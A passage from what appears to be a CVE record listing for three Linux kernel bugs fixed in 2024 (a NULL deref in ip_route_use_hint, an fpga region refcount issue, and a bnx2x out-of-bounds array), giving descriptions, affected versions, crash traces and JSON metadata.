bpf_prog_test_run_xdp+0x81f/0x1170 net/bpf/test_run.c:1376 bpf_prog_test_run+0x349/0x3c0 kernel/bpf/syscall.c:3736 __sys_bpf+0x45c/0x710 kernel/bpf/syscall.c:5115 __do_sys_bpf kernel/bpf/syscall.c:5201 [inline] __se_sys_bpf kernel/bpf/syscall.c:5199 [inline] __x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5199

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7da0f91681c4902bc…
	https://git.kernel.org/stable/c/03b5a9b2b526862b2…
	https://git.kernel.org/stable/c/7a25bfd12733a8f38…
	https://git.kernel.org/stable/c/8240c7308c941db4d…
	https://git.kernel.org/stable/c/c71ea3534ec0936fc…
	https://git.kernel.org/stable/c/58a4c9b1e5a3e53c9…

Impacted products

Vendor

Product

Version

Linux

Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < 7da0f91681c4902bc5c210356fdd963b04d5d1d4 (git)
Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < 03b5a9b2b526862b21bcc31976e393a6e63785d1 (git)
Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < 7a25bfd12733a8f38f8ca47c581f876c3d481ac0 (git)
Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < 8240c7308c941db4d9a0a91b54eca843c616a655 (git)
Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < c71ea3534ec0936fc57e6fb271c7cc6a2f68c295 (git)
Affected: 02b24941619fcce3d280311ac73b1e461552e9c8 , < 58a4c9b1e5a3e53c9148e80b90e1e43897ce77d1 (git)

Linux

Affected: 5.5
Unaffected: 0 , < 5.5 (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36008",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T14:05:40.708798Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:47:45.179Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.519Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7da0f91681c4902bc5c210356fdd963b04d5d1d4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/03b5a9b2b526862b21bcc31976e393a6e63785d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7a25bfd12733a8f38f8ca47c581f876c3d481ac0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8240c7308c941db4d9a0a91b54eca843c616a655"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c71ea3534ec0936fc57e6fb271c7cc6a2f68c295"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/58a4c9b1e5a3e53c9148e80b90e1e43897ce77d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/route.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7da0f91681c4902bc5c210356fdd963b04d5d1d4",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            },
            {
              "lessThan": "03b5a9b2b526862b21bcc31976e393a6e63785d1",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            },
            {
              "lessThan": "7a25bfd12733a8f38f8ca47c581f876c3d481ac0",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            },
            {
              "lessThan": "8240c7308c941db4d9a0a91b54eca843c616a655",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            },
            {
              "lessThan": "c71ea3534ec0936fc57e6fb271c7cc6a2f68c295",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            },
            {
              "lessThan": "58a4c9b1e5a3e53c9148e80b90e1e43897ce77d1",
              "status": "affected",
              "version": "02b24941619fcce3d280311ac73b1e461552e9c8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/route.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.5"
            },
            {
              "lessThan": "5.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: check for NULL idev in ip_route_use_hint()\n\nsyzbot was able to trigger a NULL deref in fib_validate_source()\nin an old tree [1].\n\nIt appears the bug exists in latest trees.\n\nAll calls to __in_dev_get_rcu() must be checked for a NULL result.\n\n[1]\ngeneral protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]\nCPU: 2 PID: 3257 Comm: syz-executor.3 Not tainted 5.10.0-syzkaller #0\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:fib_validate_source+0xbf/0x15a0 net/ipv4/fib_frontend.c:425\nCode: 18 f2 f2 f2 f2 42 c7 44 20 23 f3 f3 f3 f3 48 89 44 24 78 42 c6 44 20 27 f3 e8 5d 88 48 fc 4c 89 e8 48 c1 e8 03 48 89 44 24 18 \u003c42\u003e 80 3c 20 00 74 08 4c 89 ef e8 d2 15 98 fc 48 89 5c 24 10 41 bf\nRSP: 0018:ffffc900015fee40 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff88800f7a4000 RCX: ffff88800f4f90c0\nRDX: 0000000000000000 RSI: 0000000004001eac RDI: ffff8880160c64c0\nRBP: ffffc900015ff060 R08: 0000000000000000 R09: ffff88800f7a4000\nR10: 0000000000000002 R11: ffff88800f4f90c0 R12: dffffc0000000000\nR13: 0000000000000000 R14: 0000000000000000 R15: ffff88800f7a4000\nFS:  00007f938acfe6c0(0000) GS:ffff888058c00000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f938acddd58 CR3: 000000001248e000 CR4: 0000000000352ef0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n  ip_route_use_hint+0x410/0x9b0 net/ipv4/route.c:2231\n  ip_rcv_finish_core+0x2c4/0x1a30 net/ipv4/ip_input.c:327\n  ip_list_rcv_finish net/ipv4/ip_input.c:612 [inline]\n  ip_sublist_rcv+0x3ed/0xe50 net/ipv4/ip_input.c:638\n  ip_list_rcv+0x422/0x470 net/ipv4/ip_input.c:673\n  __netif_receive_skb_list_ptype net/core/dev.c:5572 [inline]\n  __netif_receive_skb_list_core+0x6b1/0x890 net/core/dev.c:5620\n  __netif_receive_skb_list net/core/dev.c:5672 [inline]\n  netif_receive_skb_list_internal+0x9f9/0xdc0 net/core/dev.c:5764\n  netif_receive_skb_list+0x55/0x3e0 net/core/dev.c:5816\n  xdp_recv_frames net/bpf/test_run.c:257 [inline]\n  xdp_test_run_batch net/bpf/test_run.c:335 [inline]\n  bpf_test_run_xdp_live+0x1818/0x1d00 net/bpf/test_run.c:363\n  bpf_prog_test_run_xdp+0x81f/0x1170 net/bpf/test_run.c:1376\n  bpf_prog_test_run+0x349/0x3c0 kernel/bpf/syscall.c:3736\n  __sys_bpf+0x45c/0x710 kernel/bpf/syscall.c:5115\n  __do_sys_bpf kernel/bpf/syscall.c:5201 [inline]\n  __se_sys_bpf kernel/bpf/syscall.c:5199 [inline]\n  __x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5199"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:24.352Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7da0f91681c4902bc5c210356fdd963b04d5d1d4"
        },
        {
          "url": "https://git.kernel.org/stable/c/03b5a9b2b526862b21bcc31976e393a6e63785d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/7a25bfd12733a8f38f8ca47c581f876c3d481ac0"
        },
        {
          "url": "https://git.kernel.org/stable/c/8240c7308c941db4d9a0a91b54eca843c616a655"
        },
        {
          "url": "https://git.kernel.org/stable/c/c71ea3534ec0936fc57e6fb271c7cc6a2f68c295"
        },
        {
          "url": "https://git.kernel.org/stable/c/58a4c9b1e5a3e53c9148e80b90e1e43897ce77d1"
        }
      ],
      "title": "ipv4: check for NULL idev in ip_route_use_hint()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36008",
    "datePublished": "2024-05-20T09:48:07.596Z",
    "dateReserved": "2024-05-17T13:50:33.152Z",
    "dateUpdated": "2025-05-04T09:10:24.352Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35247 (GCVE-0-2024-35247)

Vulnerability from cvelistv5 – Published: 2024-06-24 13:56 – Updated: 2025-05-04 09:05

Title

fpga: region: add owner module and take its refcount

Summary

In the Linux kernel, the following vulnerability has been resolved: fpga: region: add owner module and take its refcount The current implementation of the fpga region assumes that the low-level module registers a driver for the parent device and uses its owner pointer to take the module's refcount. This approach is problematic since it can lead to a null pointer dereference while attempting to get the region during programming if the parent device does not have a driver. To address this problem, add a module owner pointer to the fpga_region struct and use it to take the module's refcount. Modify the functions for registering a region to take an additional owner module parameter and rename them to avoid conflicts. Use the old function names for helper macros that automatically set the module that registers the region as the owner. This ensures compatibility with existing low-level control modules and reduces the chances of registering a region without setting the owner. Also, update the documentation to keep it consistent with the new interface for registering an fpga region.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/26e6e25d742e29885…
	https://git.kernel.org/stable/c/9b4eee8572dcf82b2…
	https://git.kernel.org/stable/c/75a001914a8d2ccdc…
	https://git.kernel.org/stable/c/4d7d12b643c00e7ee…
	https://git.kernel.org/stable/c/2279c09c36165ccde…
	https://git.kernel.org/stable/c/b7c0e1ecee403a43a…

Impacted products

Vendor

Product

Version

Linux

Affected: 0fa20cdfcc1f68847cdfc47824476301eedc8297 , < 26e6e25d742e29885cf44274fcf6b744366c4702 (git)
Affected: 0fa20cdfcc1f68847cdfc47824476301eedc8297 , < 9b4eee8572dcf82b2ed17d9a328c7fb87df2f0e8 (git)
Affected: 0fa20cdfcc1f68847cdfc47824476301eedc8297 , < 75a001914a8d2ccdcbe4b8cc7e94ac71d0e66093 (git)
Affected: 0fa20cdfcc1f68847cdfc47824476301eedc8297 , < 4d7d12b643c00e7eea51b49a60a2ead182633ec8 (git)
Affected: 0fa20cdfcc1f68847cdfc47824476301eedc8297 , < 2279c09c36165ccded4d506d11a7714e13b56019 (git)
Affected: 0fa20cdfcc1f68847cdfc47824476301eedc8297 , < b7c0e1ecee403a43abc89eb3e75672b01ff2ece9 (git)

Linux

Affected: 4.10
Unaffected: 0 , < 4.10 (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:07:46.972Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/26e6e25d742e29885cf44274fcf6b744366c4702"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9b4eee8572dcf82b2ed17d9a328c7fb87df2f0e8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/75a001914a8d2ccdcbe4b8cc7e94ac71d0e66093"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4d7d12b643c00e7eea51b49a60a2ead182633ec8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2279c09c36165ccded4d506d11a7714e13b56019"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b7c0e1ecee403a43abc89eb3e75672b01ff2ece9"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35247",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:08:36.896570Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:43.525Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "Documentation/driver-api/fpga/fpga-region.rst",
            "drivers/fpga/fpga-region.c",
            "include/linux/fpga/fpga-region.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "26e6e25d742e29885cf44274fcf6b744366c4702",
              "status": "affected",
              "version": "0fa20cdfcc1f68847cdfc47824476301eedc8297",
              "versionType": "git"
            },
            {
              "lessThan": "9b4eee8572dcf82b2ed17d9a328c7fb87df2f0e8",
              "status": "affected",
              "version": "0fa20cdfcc1f68847cdfc47824476301eedc8297",
              "versionType": "git"
            },
            {
              "lessThan": "75a001914a8d2ccdcbe4b8cc7e94ac71d0e66093",
              "status": "affected",
              "version": "0fa20cdfcc1f68847cdfc47824476301eedc8297",
              "versionType": "git"
            },
            {
              "lessThan": "4d7d12b643c00e7eea51b49a60a2ead182633ec8",
              "status": "affected",
              "version": "0fa20cdfcc1f68847cdfc47824476301eedc8297",
              "versionType": "git"
            },
            {
              "lessThan": "2279c09c36165ccded4d506d11a7714e13b56019",
              "status": "affected",
              "version": "0fa20cdfcc1f68847cdfc47824476301eedc8297",
              "versionType": "git"
            },
            {
              "lessThan": "b7c0e1ecee403a43abc89eb3e75672b01ff2ece9",
              "status": "affected",
              "version": "0fa20cdfcc1f68847cdfc47824476301eedc8297",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "Documentation/driver-api/fpga/fpga-region.rst",
            "drivers/fpga/fpga-region.c",
            "include/linux/fpga/fpga-region.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.10"
            },
            {
              "lessThan": "4.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfpga: region: add owner module and take its refcount\n\nThe current implementation of the fpga region assumes that the low-level\nmodule registers a driver for the parent device and uses its owner pointer\nto take the module\u0027s refcount. This approach is problematic since it can\nlead to a null pointer dereference while attempting to get the region\nduring programming if the parent device does not have a driver.\n\nTo address this problem, add a module owner pointer to the fpga_region\nstruct and use it to take the module\u0027s refcount. Modify the functions for\nregistering a region to take an additional owner module parameter and\nrename them to avoid conflicts. Use the old function names for helper\nmacros that automatically set the module that registers the region as the\nowner. This ensures compatibility with existing low-level control modules\nand reduces the chances of registering a region without setting the owner.\n\nAlso, update the documentation to keep it consistent with the new interface\nfor registering an fpga region."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:05:17.767Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/26e6e25d742e29885cf44274fcf6b744366c4702"
        },
        {
          "url": "https://git.kernel.org/stable/c/9b4eee8572dcf82b2ed17d9a328c7fb87df2f0e8"
        },
        {
          "url": "https://git.kernel.org/stable/c/75a001914a8d2ccdcbe4b8cc7e94ac71d0e66093"
        },
        {
          "url": "https://git.kernel.org/stable/c/4d7d12b643c00e7eea51b49a60a2ead182633ec8"
        },
        {
          "url": "https://git.kernel.org/stable/c/2279c09c36165ccded4d506d11a7714e13b56019"
        },
        {
          "url": "https://git.kernel.org/stable/c/b7c0e1ecee403a43abc89eb3e75672b01ff2ece9"
        }
      ],
      "title": "fpga: region: add owner module and take its refcount",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35247",
    "datePublished": "2024-06-24T13:56:50.704Z",
    "dateReserved": "2024-06-24T13:54:11.059Z",
    "dateUpdated": "2025-05-04T09:05:17.767Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42148 (GCVE-0-2024-42148)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-11-03 22:02

Title

bnx2x: Fix multiple UBSAN array-index-out-of-bounds

Summary

In the Linux kernel, the following vulnerability has been resolved: bnx2x: Fix multiple UBSAN array-index-out-of-bounds Fix UBSAN warnings that occur when using a system with 32 physical cpu cores or more, or when the user defines a number of Ethernet queues greater than or equal to FP_SB_MAX_E1x using the num_queues module parameter. Currently there is a read/write out of bounds that occurs on the array "struct stats_query_entry query" present inside the "bnx2x_fw_stats_req" struct in "drivers/net/ethernet/broadcom/bnx2x/bnx2x.h". Looking at the definition of the "struct stats_query_entry query" array: struct stats_query_entry query[FP_SB_MAX_E1x+ BNX2X_FIRST_QUEUE_QUERY_IDX]; FP_SB_MAX_E1x is defined as the maximum number of fast path interrupts and has a value of 16, while BNX2X_FIRST_QUEUE_QUERY_IDX has a value of 3 meaning the array has a total size of 19. Since accesses to "struct stats_query_entry query" are offset-ted by BNX2X_FIRST_QUEUE_QUERY_IDX, that means that the total number of Ethernet queues should not exceed FP_SB_MAX_E1x (16). However one of these queues is reserved for FCOE and thus the number of Ethernet queues should be set to [FP_SB_MAX_E1x -1] (15) if FCOE is enabled or [FP_SB_MAX_E1x] (16) if it is not. This is also described in a comment in the source code in drivers/net/ethernet/broadcom/bnx2x/bnx2x.h just above the Macro definition of FP_SB_MAX_E1x. Below is the part of this explanation that it important for this patch /* * The total number of L2 queues, MSIX vectors and HW contexts (CIDs) is * control by the number of fast-path status blocks supported by the * device (HW/FW). Each fast-path status block (FP-SB) aka non-default * status block represents an independent interrupts context that can * serve a regular L2 networking queue. However special L2 queues such * as the FCoE queue do not require a FP-SB and other components like * the CNIC may consume FP-SB reducing the number of possible L2 queues * * If the maximum number of FP-SB available is X then: * a. If CNIC is supported it consumes 1 FP-SB thus the max number of * regular L2 queues is Y=X-1 * b. In MF mode the actual number of L2 queues is Y= (X-1/MF_factor) * c. If the FCoE L2 queue is supported the actual number of L2 queues * is Y+1 * d. The number of irqs (MSIX vectors) is either Y+1 (one extra for * slow-path interrupts) or Y+2 if CNIC is supported (one additional * FP interrupt context for the CNIC). * e. The number of HW context (CID count) is always X or X+1 if FCoE * L2 queue is supported. The cid for the FCoE L2 queue is always X. */ However this driver also supports NICs that use the E2 controller which can handle more queues due to having more FP-SB represented by FP_SB_MAX_E2. Looking at the commits when the E2 support was added, it was originally using the E1x parameters: commit f2e0899f0f27 ("bnx2x: Add 57712 support"). Back then FP_SB_MAX_E2 was set to 16 the same as E1x. However the driver was later updated to take full advantage of the E2 instead of having it be limited to the capabilities of the E1x. But as far as we can tell, the array "stats_query_entry query" was still limited to using the FP-SB available to the E1x cards as part of an oversignt when the driver was updated to take full advantage of the E2, and now with the driver being aware of the greater queue size supported by E2 NICs, it causes the UBSAN warnings seen in the stack traces below. This patch increases the size of the "stats_query_entry query" array by replacing FP_SB_MAX_E1x with FP_SB_MAX_E2 to be large enough to handle both types of NICs. Stack traces: UBSAN: array-index-out-of-bounds in drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c:1529:11 index 20 is out of range for type 'stats_query_entry [19]' CPU: 12 PID: 858 Comm: systemd-network Not tainted 6.9.0-060900rc7-generic #202405052133 Hardware name: HP ProLiant DL360 Gen9/ProLiant DL360 ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/cfb04472ce33bee25…
	https://git.kernel.org/stable/c/cbe53087026ad929c…
	https://git.kernel.org/stable/c/8b17cec33892a66bb…
	https://git.kernel.org/stable/c/0edae06b4c227bcfa…
	https://git.kernel.org/stable/c/9504a1550686f53b0…
	https://git.kernel.org/stable/c/f1313ea92f8245192…
	https://git.kernel.org/stable/c/b9ea38e767459111a…
	https://git.kernel.org/stable/c/134061163ee5ca475…

Impacted products

Vendor

Product

Version

Linux

Affected: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 , < cfb04472ce33bee2579caf4dc9f4242522f6e26e (git)
Affected: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 , < cbe53087026ad929cd3950508397e8892a6a2a0f (git)
Affected: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 , < 8b17cec33892a66bbd71f8d9a70a45e2072ae84f (git)
Affected: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 , < 0edae06b4c227bcfaf3ce21208d49191e1009d3b (git)
Affected: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 , < 9504a1550686f53b0bab4cab31d435383b1ee2ce (git)
Affected: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 , < f1313ea92f82451923e28ab45a4aaa0e70e80b98 (git)
Affected: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 , < b9ea38e767459111a511ed4fb74abc37db95a59d (git)
Affected: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 , < 134061163ee5ca4759de5c24ca3bd71608891ba7 (git)

Linux

Affected: 3.3
Unaffected: 0 , < 3.3 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:14.116Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cfb04472ce33bee2579caf4dc9f4242522f6e26e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cbe53087026ad929cd3950508397e8892a6a2a0f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8b17cec33892a66bbd71f8d9a70a45e2072ae84f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0edae06b4c227bcfaf3ce21208d49191e1009d3b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9504a1550686f53b0bab4cab31d435383b1ee2ce"
          },
          {
            "tags": [
              "x_transferred"
            ],
